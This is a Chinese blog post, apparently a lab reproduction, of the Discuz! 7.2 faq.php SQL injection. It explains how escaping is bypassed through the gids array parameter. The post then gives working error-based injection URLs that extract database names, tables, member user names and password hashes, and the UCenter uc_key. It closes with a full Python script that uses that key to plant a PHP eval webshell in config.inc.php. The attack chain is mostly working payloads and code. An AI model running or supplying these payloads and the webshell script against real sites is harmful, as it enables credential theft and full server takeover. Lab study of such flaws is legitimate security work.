Discuz!7.2 SQL注入复现实验

最新推荐文章于 2024-04-21 14:08:32 发布
最新推荐文章于 2024-04-21 14:08:32 发布
阅读量2.1k 收藏 4
点赞数 3
分类专栏: 实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GG_iii/article/details/109098692
版权

0x01 实验准备

实验原理:

Discuz7.2 SQL注入漏洞利用PHP特性突破GPC,形成SQL注入漏洞。

实验工具:

UCenter+Discuz 7.2安装包

实验环境:
  1. 安装 Discuz 网站的服务器(Windows)
  2. 安装 python 环境的攻击机

0x01 实验步骤

一、搭建环境
1. 安装UCenter

通过 http://192.168.88.129/dz7.2/upload/install/index.php 页面安装:
在这里插入图片描述
出现错误:
在这里插入图片描述
将UCenter文件放置在dz7.2文件夹下,访问http://192.168.88.129/dz7.2/UCenter/upload/install/index.php:
在这里插入图片描述
安装UCenter成功:
在这里插入图片描述

2. 安装Discuz

通过 UCenter 页面安装Discuz:
在这里插入图片描述
根据实际情况填写数据库等信息后,安装成功会自动跳转:
在这里插入图片描述

二、SQL注入漏洞复现
1. 漏洞形成原因

代码:
faq.php文件在 upload 文件夹下:

$query = $db->query("SELECT groupid, type, grouptitle, radminid FROM {$tablepre}usergroups ORDER BY (creditshigher<>'0' || creditslower<>'0'), creditslower");

discuz在全局会对GET数组进行addslashes转义,会将 ’ 转义成 ’ 。
当传入的参数是:gids[1]=' ,会被转义成 gids[1]=\'

$groupids = array();
foreach($gids as $row) {
	$groupids[] = $row[0];
}

赋值语句 $groupids[] = $row[0] 就相当于取了字符串的第一个字符
\,所以把转义符号取出来了。

function implodeids($array) {
	if(!empty($array)) {
		return "'".implode("','", is_array($array) ? $array : array($array))."'";
	} else {
		return '';
	}
}
此函数在 \include\global.func.php

将数据放入sql语句前,用 implodeids 处理过一次。implodeids函数是将$groupids数组用','分割开,组成一个类似于 ‘1’,‘2’,‘3’,‘4’ 的字符串返回。
由于刚取出一个转义符,会将正常的 ' 转义后为:'1','\','3','4'
第4个单引号被转义了,所以第5个单引号和第3个单引号形成了闭合。位置3就等于逃逸成功,形成注入。
通过提交 faq.php?gids[uid1]='&gids[uid2][0]=evilcode ,这样的构造形式语句可以突破GPC或类似的安全处理,形成SQL注入漏洞。
注意:uid1和uid2 > 网站注册用户iduid1与uid2不能相等

2.漏洞利用

(1)查询当前数据库/MySQL用户信息:

faq.php?action=grouppermission&gids[112]='&gids[113][0]=)and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

若查询MySQL用户信息,修改 database()user()

(2)利用 information_schame 查询库:

faq.php?action=grouppermission&gids[112]='&gids[113][0]=)and (select 1 from (select count(*),concat((select (select (select concat(schema_name,0x7e) from information_schema.schemata limit 0,1) ) from`information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

若查询下个数据库,修改 from information_schema.schemata limit 0,1 中的 0

(3)查询列:

faq.php?action=grouppermission&gids[112]='&gids[113][0]=)and (select 1 from (select count(*),concat(floor(rand(0)*2),0x7e,(select hex(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e)x from information_schema.tables group by x)a) --+

若查询下一个列,修改 from information_schema.tables where table_schema=database() limit 0,1 中的 0

(4)查询 cdb_members 表的 username 和 password 数据(网站注册用户的账号密码):

faq.php?action=grouppermission&gids[112]='&gids[113][0]=)and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 0,1) ) from`information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

若查询下一行数据,修改 from cdb_members limit 0,1 中的 0

(5)跨库获取uc_key(利用key写入配置文件config.inc.php getshell):

faq.php?action=grouppermission&gids[112]='&gids[113][0]=)and (select 1 from (select count(*),concat((select (select (select substr(authkey,1,66) from ucenter.uc_applications limit 0,1) ) from`information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

若查询下一行数据,修改 from uc_applications limit 0,1 中的 0
3.利用uc_key写入配置文件getshell

**原理:**过滤存在问题,导致在提交配置文件的时候,把一句话木马写入配置文件中。执行成功以后,会在根目录的config.inc.php文件中写入一句话木马。

使用命令: python xxx.py http://xxxx uc_key值

第一个参数是网站根路径,第二个参数是uc_key值。

python脚本:

#! /usr/bin/env python
#coding=utf-8
import hashlib
import time
import math
import base64
import urllib
import urllib2
import sys
 
def microtime(get_as_float = False) :
    if get_as_float:
        return time.time()
    else:
        return '%.8f %d' % math.modf(time.time())
 
def get_authcode(string, key = ''):
    ckey_length = 4
    key = hashlib.md5(key).hexdigest()
    keya = hashlib.md5(key[0:16]).hexdigest()
    keyb = hashlib.md5(key[16:32]).hexdigest()
    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
    #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]
    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()
 
    key_length = len(cryptkey)
    string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string
    string_length = len(string)
    result = ''
    box = range(0, 256)
    rndkey = dict()
    for i in range(0,256):
        rndkey[i] = ord(cryptkey[i % key_length])
    j=0
    for i in range(0,256):
        j = (j + box[i] + rndkey[i]) % 256
        tmp = box[i]
        box[i] = box[j]
        box[j] = tmp
    a=0
    j=0
    for i in range(0,string_length):
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        tmp = box[a]
        box[a] = box[j]
        box[j] = tmp
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
    return keyc + base64.b64encode(result).replace('=', '')
 
def get_shell(url,key,host):
    '''
    发送命令获取webshell
    '''
    headers={'Accept-Language':'zh-cn',
    'Content-Type':'application/x-www-form-urlencoded',
    'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
    'Referer':url
    }
    tm = time.time()+10*3600
    tm="time=%d&action=updateapps" %tm
    code = urllib.quote(get_authcode(tm,key))
    url=url+"?code="+code
    data1='''<?xml version="1.0" encoding="ISO-8859-1"?>
            <root>
            <item id="UC_API">http://xxx\');eval($_POST[1]);//</item>
            </root>'''
    try:
        req=urllib2.Request(url,data=data1,headers=headers)
        ret=urllib2.urlopen(req)
    except:
        return "访问出错"
    data2='''<?xml version="1.0" encoding="ISO-8859-1"?>
            <root>
            <item id="UC_API">http://aaa</item>
            </root>'''
    try:
        req=urllib2.Request(url,data=data2,headers=headers)
        ret=urllib2.urlopen(req)
    except:
        return "error"
    return "webshell:"+host+"/config.inc.php,password:1"
 
if __name__ == '__main__':
    host=sys.argv[1]
    key=sys.argv[2]
    url=host+"/api/uc.php"
    print get_shell(url,key,host)

执行成功:
执行成功后,config.inc.php文件被修改为:
在这里插入图片描述

GoKing1
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入漏洞复现(CVE-2017-8917)
m0_56578216的博客
08-30 637
前提条件:1.Docker Compose是 docker 提供的一个命令行工具,用来定义和运行由多个容器组成的应用,而docker-compose.yml是它的配置文件。
Discuz X 系列全版本 后台Sql注入漏洞
bulangman277的博客
12-28 3474
Discuz! X 系列全版本 后台Sql注入漏洞
漏洞复现-DiscuzX 系列全版本后台SQL注入漏洞
qq_59350385的博客
05-10 1505
目录 环境搭建 (1)源码下载: 漏洞检测 报错注入 写文件 漏洞分析 环境搭建 (1)源码下载: https://search.gitee.com/?skin=rec&type=repository&q=discuz git clonehttp://htts://gite.com/ComsenzDiscuzX.git 放置于web根目录,访问即可进入安装页面 (2)也可搭建vulhub靶场,启动discuz环境 漏洞检测 http://.....
Discuz开源论坛_v3.1系列_Sql注入漏洞详解
weixin_60708754的博客
05-12 1135
Discuz v3.1系列版本 Sql注入全流程详解
网络安全之SQL注入漏洞复现(中篇)(技术进阶)
最新发布
weixin_70911257的博客
04-21 1179
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
Discuz!X系列全版本后台sql注入复现
浅笑996的博客
06-28 3050
圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接 0x01 环境准备 1、首先去码云下载最新版本的discuzDiscuzX 3.4 R20191201)。 2、将upaod放置到网站目录下,访问安装目录安装即可。 0x02 漏洞复现 点击站长--UCenter设置 点击最下面的提交进行抓包 判断列数 1' order by 1 //返回正确 1' order by 2 //返回错误 查询当前用户 1' and updatexml(.
Discuz!云平台 for Discuz!7.2 v1.0 GBK.zip
07-14
Discuz!云平台致力于帮助站长提高网站流量,增强网站运营能力,增加网站收入。... 7.2版 提供的服务包括:QQ互联、腾讯分析、纵横搜索、Discuz! 联盟、漫游应用。Discuz!云平台将陆续提供更多优质服务项目。
Discuz! 7.2 安全补丁 build 20101020.zip
07-09
Discuz! 7.2 安全补丁 20101020 GBK/UTF8  补丁发布日期:20101020  更新补丁方法:  下载解压之后,请到论坛后台进行文件校验,与解压缩的upload文件夹中对应的文件进行比较,确认一下这些文件是否有做修改。...
Discuz!7.2用户手册.chm
03-20
Discuz!7.2用户手册..................
Google Sitemap插件 for Discuz! 7.2 GBK.rar
07-14
Google Sitemap插件for Discuz! 7.2 GBK【让谷歌天天收录你的网站】极大的增加网站收录 该插件适用于Discuz 7.0/7.1 最后更新:2009年11月8日  安装方法: 1.下载后,上传所有文件至论坛根目录 2.进入论坛后台-...
红包插件 for Discuz! 7.2 GBK.rar
07-14
Discuz!7.2红包插件.   安装说明: 详细见附件。 解压后文件夹里有如下文件
discuz7.2漏洞复现--python编写poc
m0_65129142的博客
12-21 1087
环境搭建 准备一台win7装上的phpstudy 将discuz7.2源码放进去 安装discuz之前,需要先安装center 文件夹搭建存放的位置是: 解压完成之后更改名称 再然后需要把ucenter放到discuz源码下边 开始安装 安装discuz之前 首先需要安装ucenter 我们先将源码拉进phpstudy根目录下边 首先安装ucenter 需要填的只有标红框的 安装完成之后 我们进行安装2 最关键的一步来了 需要将ucenter的url修改成http://192.168.
discuz7.2漏洞分析
qq_38415434的博客
08-07 864
一 参数的入口 这段话的意思时遍历三种提交的方法,获取参数传递的值。 有一个函数是daddslashes,跟进看一下。 这段代码的意思是对数据里的每一个字符都进行转义处理 二 漏洞产生的代码在faq.php195行 跟进implodeid函数,在faq.php的675行 这个函数的功能将数组里的值拆分出来,如图 到了这里我们知道,如果数组值当中存在在 / 或者 ’ ,那么在拼接s...
iis搭建discuz7.2 的曲折经历 已经各种报错的处理
qq_21160243的博客
04-27 147
iis搭建discuz7.2 的曲折经历 以及各种报错的处理 HTTP 错误 500.0 等等
Discuz!论坛安装教程
06-27 811
四、升级论坛 返回目录 下一课  当有新版本出来 时,可以在原来的基础上升级,升级前做好备份,下面我们来看一个练习;  1、升级安装到7.2  1)打开下载的7.2安装包,先看里面的readme文件夹里的,readme和upgrade两个文件,掌握升级的方法;    2)解压upload文件夹,复制除了 install/文件夹和config.inc.php以外的所有内容,覆盖到论坛源文件
Discuz 7.2坑爹集锦-SQL篇 -update 2012.02.09
weixin_34015336的博客
01-17 175
为什么80%的码农都做不了架构师?>>> ...
7.2 discuz 拿shell_Discuz! 7.2 SQL注入exp(getshell版)
weixin_39616686的博客
12-22 467
已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。...
7.2 discuz 拿shell_Discuz 7.2FAQ-GETshell
weixin_42608299的博客
02-15 505
#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: gb2312 -*-# -*- coding: utf_8 -*-# author sbimport sysimport hashlibimport timeimport mathimport base64import urllib2import urllibimport redef s...
Discuz! 7.2 安装图文教程 [ 对应Discuz! 7.2 ]
01-31 525
本教程讲解的全新安装 Discuz! 7.2 的方法(以虚拟空间上安装 Discuz! 7.2 为例演示)。安装 Discuz! 7.2 前请确保是否已经安装好了 UCenter 1.5,参考教程如下:UCenter 1.5 安装图文教程:http://faq.comsenz.com/viewnews-449UCenter 1.5 安装视频教程:http://faq.comsenz.c
discuz7.2 sql注入漏洞
06-02
Discuz! 7.2曾经存在SQL注入漏洞,这个漏洞是由于程序没有充分过滤用户输入的数据而导致的。攻击者可以通过构造特定的SQL语句来绕过程序的验证和过滤,从而获取到系统中的敏感数据。 为了避免这个漏洞,建议用户及时升级到最新版本的Discuz!,同时也应该加强系统的安全防护措施,如限制数据库用户权限、开启防火墙等。此外,还可以通过对用户输入数据进行严格的过滤和验证来避免SQL注入漏洞的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值